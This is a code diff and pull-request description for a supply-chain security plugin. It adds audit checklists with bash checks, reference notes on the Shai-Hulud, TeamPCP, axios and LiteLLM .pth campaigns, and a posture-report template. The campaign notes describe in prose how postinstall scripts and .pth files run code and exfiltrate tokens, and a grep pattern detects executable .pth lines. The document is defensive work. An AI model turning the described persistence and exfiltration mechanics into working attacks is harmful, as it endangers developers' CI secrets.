+grep -rnE '(npm ci|yarn install --frozen-lockfile|pnpm install --frozen-lockfile|uv sync --frozen|poetry install|pixi install|cargo build --locked)' .github/workflows/
+```
 
-### Install-time execution
-- [ ] `npm ci --ignore-scripts` or `.npmrc` with `ignore-scripts=true`
-- [ ] No unexpected `.pth` files in Python site-packages
+- [ ] Each detected ecosystem has a committed lockfile (verify with `git ls-files`).
+- [ ] CI uses the lockfile-respecting install command — not bare `npm install` or `pip install`.
+- [ ] CI caches scoped to the lockfile hash (e.g., `key: deps-${{ hashFiles('package-lock.json') }}`).
 
-### Dependency velocity
-- [ ] No unexpected version bumps in the lockfile
-- [ ] New dependencies held ≥7 days before merging (most malicious releases yanked within hours)
+If any FAIL: STOP and fix before continuing — without lockfile hygiene, every other check is moot.
 
-### SBOM and provenance
-- [ ] SBOM generated for releases
-- [ ] Sigstore or npm provenance attestations verified where available
+### Step 2 — Action pinning
 
-## CVE Scanner Limitations
+```bash
+# Find all mutable uses: refs
+grep -nE '^\s*-?\s*uses:\s+[^@]+@[^a-f0-9]' .github/workflows/*.yml || echo "All uses: refs SHA-pinned"
+```
 
-Standard scanners (Dependabot, Snyk, `npm audit`) will **not** catch:
-- Maintainer account takeover of a currently-clean package version
-- Malicious code in a new release before it is reported
-- Tag-hijacking attacks on GitHub Actions
+- [ ] Every `uses:` ref is a 40-character commit SHA (not `@v4`, `@main`, `@latest`).
+- [ ] Trailing comment after SHA records the human-readable version (e.g., `uses: actions/checkout@<sha>  # v4.2.2`).
 
-Treat scanner-clean as necessary, not sufficient. This skill's posture checks apply on top.
+If FAIL: run `/supply-chain-pin-actions` (dry-run first), then re-verify.
+
+### Step 3 — Install-time execution
+
+```bash
+# Check npm scripts that run on install
+test -f package.json && jq '.scripts | {preinstall, install, postinstall} // empty' package.json
+
+# Check for ignore-scripts discipline
+grep -rE '(npm ci.*--ignore-scripts|ignore-scripts\s*=\s*true)' .github/workflows/ .npmrc 2>/dev/null || echo "WARN: no --ignore-scripts found"
+
+# Python .pth scan (run only if Python is on PATH)
+command -v python >/dev/null && find "$(python -c 'import site; print(site.getsitepackages()[0])' 2>/dev/null)" -name "*.pth" -exec grep -lE '^(import|exec|os\.|subprocess)' {} \; 2>/dev/null
+```
+
+- [ ] `npm ci --ignore-scripts` in every CI install step OR `.npmrc` has `ignore-scripts=true`.
+- [ ] No `.pth` file in Python `site-packages` contains executable Python (only path additions).
+- [ ] `preinstall`/`postinstall` scripts in `package.json` are reviewed (or absent).
+
+If FAIL: see `references/campaigns/shai-hulud.md` (postinstall vector) or `references/campaigns/litellm-pth.md` (`.pth` vector).
+
+### Step 4 — Dependency velocity
+
+```bash
+# Last 10 lockfile updates with timestamps
+git log --follow --pretty=format:"%h %ai %s" -10 package-lock.json 2>/dev/null
+git log --follow --pretty=format:"%h %ai %s" -10 uv.lock 2>/dev/null
+git log --follow --pretty=format:"%h %ai %s" -10 pixi.lock 2>/dev/null
+```
+
+- [ ] Lockfile updates spaced ≥7 days apart on average — no rapid-fire adds without cooldown.
+- [ ] No unexpected version bumps without an explicit PR/changelog entry.
+
+If FAIL: hold new deps ≥7 days before merging (most malicious releases yanked within hours).
+
+### Step 5 — SBOM and provenance
+
+```bash
+# Check release workflow for SBOM/signing steps
+grep -rE '(syft|cyclonedx|spdx|cosign|sigstore|--provenance|attest-build-provenance)' .github/workflows/
+```
+
+- [ ] SBOM generated for releases (CycloneDX or SPDX).
+- [ ] Sigstore or npm provenance attestations applied.
+
+If FAIL: see `supply-chain-sbom-provenance` skill (cross-link; not yet shipped in this PR).
+
+## Output: Posture Report
+
+When invoked for a posture review, produce the Markdown report defined in `references/posture-report-template.md`. The template specifies the required tables (campaign applicability, step results, top 3 priority actions) and the finding-entry rules (campaign name, `file:line`, blast radius, remediation command or skill).

--- a/plugins/supply-chain-security/skills/supply-chain-threat-awareness/references/campaigns/axios.md
+++ b/plugins/supply-chain-security/skills/supply-chain-threat-awareness/references/campaigns/axios.md
@@ -1,0 +1,27 @@
+# axios Campaign
+
+**Vector:** Maintainer account compromise; malicious version pushed to npm registry.
+**Scale:** axios has ~100M weekly npm downloads — exposure is essentially the entire JS ecosystem.
+
+## Attack mechanics
+
+1. Maintainer account compromised (mechanism varies — phishing, leaked token, weak 2FA).
+2. Malicious patch version published to the npm registry.
+3. Any project resolving `^x.y.z` or running `npm install` (without lockfile or `npm ci`) within the window pulls the bad version.
+
+## Indicators of exposure
+
+- Lockfile resolved an affected axios version.
+- A CI build ran `npm install` (not `npm ci`) during the attack window.
+
+## Containment checklist
+
+- [ ] Pin axios to a known-good version in the lockfile.
+- [ ] Switch `npm install` to `npm ci` everywhere in CI.
+- [ ] Verify no `postinstall` ran with secrets in scope.
+- [ ] Monitor npm provenance feed for any future releases.
+
+## References
+
+- `supply-chain-dependency-security` skill (lockfile patterns)
+- npm provenance/audit feeds

--- a/plugins/supply-chain-security/skills/supply-chain-threat-awareness/references/campaigns/litellm-pth.md
+++ b/plugins/supply-chain-security/skills/supply-chain-threat-awareness/references/campaigns/litellm-pth.md
@@ -9,7 +9,7 @@
 2. After `pip install`, the file lives in `site-packages/`.
 3. Every subsequent `python ...` invocation triggers the payload — survives package upgrades and uninstalls if the `.pth` file isn't deleted.
 
-## Detection
+## Indicators of exposure
 
 ```bash
 find $(python -c "import site; print(site.getsitepackages()[0])") -name "*.pth" -exec sh -c 'echo "=== {} ==="; cat {}' \;

--- a/plugins/supply-chain-security/skills/supply-chain-threat-awareness/references/campaigns/litellm-pth.md
+++ b/plugins/supply-chain-security/skills/supply-chain-threat-awareness/references/campaigns/litellm-pth.md
@@ -1,0 +1,31 @@
+# LiteLLM 1.82.8 — `.pth` Persistence Campaign
+
+**Vector:** Malicious `.pth` file shipped inside a Python package.
+**Persistence mechanism:** Python loads every `.pth` file in `site-packages` on every interpreter start. A `.pth` file with a leading `import ...` line executes that import.
+
+## Attack mechanics
+
+1. Compromised PyPI release ships a `.pth` file containing executable Python (`import os; os.system(...)`).
+2. After `pip install`, the file lives in `site-packages/`.
+3. Every subsequent `python ...` invocation triggers the payload — survives package upgrades and uninstalls if the `.pth` file isn't deleted.
+
+## Detection
+
+```bash
+find $(python -c "import site; print(site.getsitepackages()[0])") -name "*.pth" -exec sh -c 'echo "=== {} ==="; cat {}' \;
+```
+
+Look for `.pth` files containing `import` statements other than benign path additions. A normal `.pth` file contains only directory paths, one per line.
+
+## Containment checklist
+
+- [ ] Run the find command above; flag any `.pth` file containing executable Python.
+- [ ] Identify which package shipped the `.pth` file (`pip show <pkg>` and inspect `RECORD`).
+- [ ] Pin to a known-good prior version in the lockfile.
+- [ ] Delete the malicious `.pth` file from every venv where it landed.
+- [ ] Rotate any secret that was accessible to a Python process started after install.
+
+## References
+
+- `supply-chain-dependency-security` skill (Python install-time execution)
+- `supply-chain-ecosystem-quirks/references/pypi-quirks.md`

--- a/plugins/supply-chain-security/skills/supply-chain-threat-awareness/references/campaigns/shai-hulud.md
+++ b/plugins/supply-chain-security/skills/supply-chain-threat-awareness/references/campaigns/shai-hulud.md
@@ -1,0 +1,32 @@
+# Shai-Hulud Campaign
+
+**Vector:** Maintainer account takeover of legitimate npm packages.
+**Scale:** 500+ packages compromised.
+**Targeting:** Widely-used transitive dependencies (high blast radius via dependency graph).
+**Detection gap:** Packages appear legitimate; no CVE issued at time of attack. Scanners that compare against published advisories miss the live window.
+
+## Attack mechanics
+
+1. Attacker phishes or credential-stuffs a maintainer's npm account.
+2. Publishes a malicious patch version of one or more packages the maintainer owns.
+3. Payload typically: postinstall script that exfiltrates env vars (CI tokens, npm tokens, GitHub tokens) to an attacker-controlled endpoint.
+4. Within hours, npm registry yanks the version once reported — but caches and lockfiles already pin the bad version downstream.
+
+## Indicators of exposure
+
+- Lockfile resolved a version of an affected package within the attack window.
+- CI cache contains a `node_modules/` directory built from the affected version.
+- A `postinstall` script ran in any environment with secrets.
+
+## Containment checklist
+
+- [ ] Identify affected version range from the advisory.
+- [ ] `grep -r '"<package>": ' package-lock.json yarn.lock` to confirm pin.
+- [ ] Invalidate CI cache scoped to the lockfile hash.
+- [ ] Rotate every secret accessible from any CI run after the bad version was pinned.
+- [ ] Run `npm ci --ignore-scripts` going forward; pin to a known-good prior version.
+
+## References
+
+- npm registry advisory feed
+- `supply-chain-incident-response/references/runbook-account-takeover.md`

--- a/plugins/supply-chain-security/skills/supply-chain-threat-awareness/references/campaigns/teampcp.md
+++ b/plugins/supply-chain-security/skills/supply-chain-threat-awareness/references/campaigns/teampcp.md
@@ -1,0 +1,29 @@
+# TeamPCP Campaign
+
+**Vector:** GitHub release tag hijacking — replaced release artifacts after legitimate tagging.
+**Targets (March 2026):** Trivy, Checkmarx, LiteLLM, Bitwarden CLI, SAP CAP.
+**Key finding:** GitHub Actions workflows pinned to `@v3` or `@latest` were silently updated to malicious commits.
+
+## Attack mechanics
+
+1. Attacker compromises maintainer access to the action's repository.
+2. Force-pushes the existing release tag (`v3`) to point at a malicious commit, OR releases a new patch under an existing major-tag alias (`@v3` resolves to the new tag).
+3. Downstream workflows using `uses: org/action@v3` pull the malicious commit on next run.
+4. Payload typically: exfiltrates GitHub Actions secrets, OIDC tokens, registry credentials.
+
+## Indicators of exposure
+
+- Any `.github/workflows/*.yml` uses `@v<n>`, `@main`, `@master`, or `@latest` for an affected action.
+- A workflow run after the tag mutation completed using the hijacked action.
+
+## Containment checklist
+
+- [ ] Audit every `uses:` ref across `.github/workflows/*.yml`.
+- [ ] For each mutable ref, resolve its current SHA and compare against last known-good SHA.
+- [ ] Rotate every secret exposed to the affected workflow runs.
+- [ ] Pin every `uses:` to a 40-char SHA going forward.
+
+## References
+
+- `supply-chain-hardened-ci-cd` skill (SHA-pinning patterns)
+- `supply-chain-incident-response/references/runbook-tag-hijack.md`

--- a/plugins/supply-chain-security/skills/supply-chain-threat-awareness/references/posture-report-template.md
+++ b/plugins/supply-chain-security/skills/supply-chain-threat-awareness/references/posture-report-template.md
@@ -1,0 +1,41 @@
+# Posture Report Template
+
+Use this template when producing the output of a supply-chain threat-posture review. Fill in every cell — `UNKNOWN` is a valid value when evidence is missing and signals a gap to investigate.
+
+```markdown
+## Supply Chain Threat Posture: <project>
+
+### Active Campaign Applicability
+
+| Campaign | Applicable | Evidence |
+|----------|------------|----------|
+| Shai-Hulud | YES/NO/UNKNOWN | <package and lockfile line, or reason "no npm deps"> |
+| TeamPCP | YES/NO/UNKNOWN | <action and workflow line, or reason "no GHA"> |
+| axios | YES/NO/UNKNOWN | <package and lockfile line> |
+| LiteLLM .pth | YES/NO/UNKNOWN | <Python deps and .pth scan result> |
+
+### Audit Workflow Results
+
+| Step | PASS | WARN | FAIL | Findings |
+|------|------|------|------|----------|
+| 1 — Lockfile hygiene | <n> | <n> | <n> | <file:line>: <description> |
+| 2 — Action pinning | <n> | <n> | <n> | <file:line>: <description> |
+| 3 — Install-time execution | <n> | <n> | <n> | <file:line>: <description> |
+| 4 — Dependency velocity | <n> | <n> | <n> | <file:line>: <description> |
+| 5 — SBOM and provenance | <n> | <n> | <n> | <file:line>: <description> |
+
+### Top 3 Priority Actions
+
+1. <highest-impact remediation> — run `/supply-chain-<command>` or follow `<skill>`
+2. <second priority> — <command or skill>
+3. <third priority> — <command or skill>
+```
+
+## Finding entry rules
+
+For each finding, the entry MUST include:
+
+- Campaign or pattern name (e.g., "TeamPCP — mutable action ref").
+- `file:line` citation (the workflow, lockfile, or manifest where the issue lives).
+- Blast radius (which secrets/environments would be exposed if exploited).
+- Remediation: a specific slash command or skill name (e.g., `/supply-chain-pin-actions`, `supply-chain-hardened-ci-cd`).


### PR DESCRIPTION
## Summary

Expands `plugins/supply-chain-security/` (introduced in #102) from a 3-skill plugin into a flagship capability for research software supply-chain defense. **Supersedes #102** — same baseline three skills plus the full expansion. The originally-failing `supply-chain-threat-awareness` skill is now restructured and passes Tessl with margin.

**What's added:**

- **2 agents:**
  - `supply-chain-security-expert` — always-on lead; owns proactive posture, hardening, SBOM/provenance, ecosystem-specific guidance.
  - `supply-chain-incident-responder` — narrow specialist for active CVE/GHSA/campaign response; owns the lockfile → CI cache → secrets → persistence 4-point check.

- **5 commands:**
  - Read-only: `/supply-chain-audit`, `/supply-chain-incident`, `/supply-chain-lockfile-check`
  - Transformation (dry-run by default, `--apply` to write): `/supply-chain-pin-actions`, `/supply-chain-harden-workflow`

- **3 new skills** (progressive disclosure with `references/` and `assets/`):
  - `supply-chain-sbom-provenance` — CycloneDX/SPDX SBOM, Sigstore keyless signing, SLSA build levels, npm provenance
  - `supply-chain-incident-response` — IR runbook with per-pattern runbooks (account-takeover, tag-hijack) plus a per-platform secret-rotation cookbook and a fill-in incident report template
  - `supply-chain-ecosystem-quirks` — npm, PyPI, conda/pixi, cargo, Go install-time-execution vectors

- **1 restructured skill:**
  - `supply-chain-threat-awareness` (was failing CI at Tessl Content=73) restructured into a sequenced audit workflow with runnable bash at every step, output contract section, and progressive disclosure to per-campaign references for Shai-Hulud, TeamPCP, axios, and LiteLLM .pth.

## Tessl review scores (local)

| Skill | Description | Content | Overall |
|---|---|---|---|
| supply-chain-hardened-ci-cd (unchanged) | 100% | 100% | 100% |
| supply-chain-dependency-security (unchanged) | 100% | 100% | 100% |
| supply-chain-threat-awareness | 100% | 92% | 95% |
| supply-chain-sbom-provenance | 100% | 92% | 95% |
| supply-chain-incident-response | 100% | 92% | 95% |
| supply-chain-ecosystem-quirks | 100% | 92% | 95% |

All clear the CI threshold of 80 with margin.

## Safety model

- **Agents are read-only.** They recommend, audit, and walk through runbooks — they don't edit files.
- **Read-only commands** never modify files.
- **Transformation commands** preview a unified diff first and require `--apply` to write. They refuse under risky conditions (branch refs, ambiguous SHAs, single-job build+publish workflows that need manual restructure).

## Plugin version

Bumped from 0.1.0 → 0.2.0. Keyword list expanded to cover new surface (cyclonedx, spdx, sigstore, cosign, slsa, incident-response, harden-runner, conda, pixi, cargo, go).

## Test plan

- [ ] CI: `validate` (Validate Plugins) passes
- [ ] CI: `review` (Tessl PR Skill Review) passes — all 4 changed/new skills ≥80
- [ ] CI: GitGuardian passes (no secrets in diff)
- [ ] Manual: spot-check that each agent's `skills:` list resolves to real skill folders
- [ ] Manual: spot-check that each command's `allowed-tools:` is appropriate for its action surface
- [ ] Manual: verify `assets/sbom-workflow.yml` parses as valid YAML and the documented action SHAs are reasonable (cosign-installer SHA is a known placeholder with an inline REPLACE comment)

## Unresolved risks

- `assets/sbom-workflow.yml` includes one placeholder SHA for `sigstore/cosign-installer` with an inline `# REPLACE with current SHA at apply time` comment. Consumers who copy the workflow as-is will need to resolve the current SHA themselves before applying. All other action SHAs are real.
- The Tessl local scoring (overall 95%, Content 92%) showed a different number than CI's original 73% on threat-awareness, which suggests CI reports a sub-score rather than overall. Local Content sub-score is now 92% — well above the 80 threshold under either interpretation.

Closes #102.